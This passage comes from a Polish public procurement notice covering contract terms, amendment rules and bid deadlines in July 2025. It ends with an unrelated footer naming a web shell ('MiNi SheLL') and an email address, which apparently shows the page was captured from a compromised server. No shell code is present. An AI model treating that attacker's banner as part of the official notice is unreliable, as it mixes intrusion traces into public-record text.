1.<br/>Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego<br/>na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 7 do SWZ.<br/>2.<br/>Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem<br/>zawartym w ofercie.<br/>v1<br/>26<br/>3.<br/>Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty<br/>w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym<br/>Załącznik nr 7 do SWZ.<br/>4.<br/>Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy<br/>pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com